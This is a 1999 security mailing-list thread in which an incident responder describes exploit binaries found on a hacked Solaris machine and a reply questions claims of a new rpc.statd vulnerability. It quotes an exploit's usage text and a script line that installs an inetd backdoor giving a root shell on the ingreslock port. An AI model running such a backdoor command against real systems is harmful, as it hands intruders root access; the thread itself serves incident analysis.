I found two binary-only exploits on a hacked machine. The one of most interest was "amexp" which when executed without arguments presents the following: Usage: ./amexp address cache command type [port] Further help: address - system address cache - system hostname command - execute this command type - 0: Solaris 2.5.1 stock, 1: Solaris 2.5.1 patched, 2.6 & 2.7 port - optional port to bypass portmapper A shell script that was included was "go.amexp" which contained: ./amexp $1 $2 "echo 'ingreslock stream tcp nowait root /bin/sh sh' > /tmp/.xp;/usr/sbin/inetd -s /tmp/.xp" $3 The command is nearly identical to what is used for both tooltalk and rpc.cmsd attacks The proper patches were installed and I do not believe that it is the statd/automountd exploit since no indirect rpc services execution was attempted. This incident is closed. ----- Original Message ----- From: Tabor J . Wells <[EMAIL PROTECTED]> To: Bob Todd <[EMAIL PROTECTED]> Cc: <[EMAIL PROTECTED]> Sent: Tuesday, August 24, 1999 1:52 PM Subject: Re: Vulnerability in Solaris 2.6. rpc.statd ? > On Sat, Aug 21, 1999 at 12:31:18PM -0400, > Bob Todd <[EMAIL PROTECTED]> is thought to have said: > > > While performing an on-site incident response at > > _______, I found several > > Solaris-oriented exploit programs including a > > statd2.6 (others were calendar > > manager, tooltalk, and lockd?). Since there is an > > exploit program for statd on > > Solaris 2.6, I could conclude that Solaris 2.6 > > statd is vulnerable to attack. I > > have not tried the exploit, but since the machine > > was probably compromised > > by one of these programs, the threat seems real!! > > And did this server have the statd patch installed (106592-02 on sparc and > 106593-02 on x86)? Did it have the various security patches for the other > services mention installed as well? > > Perhaps the program was part of the exploit which allowed indirect RPC > calls with statd that was discussed here (and elsewhere) several weeks > back. > > I don't think your conclusion is supported given the information you > provided. Perhaps you could provide more information about the exploit > before rushing to claim that there is a new vulnerability. > > Tabor > > -- > ______________________________________________________________________ __ > Tabor J. Wells [EMAIL PROTECTED] > Technology Manager http://www.smarterliving.com > Smarter Living, Inc. It's your time. It's your money. >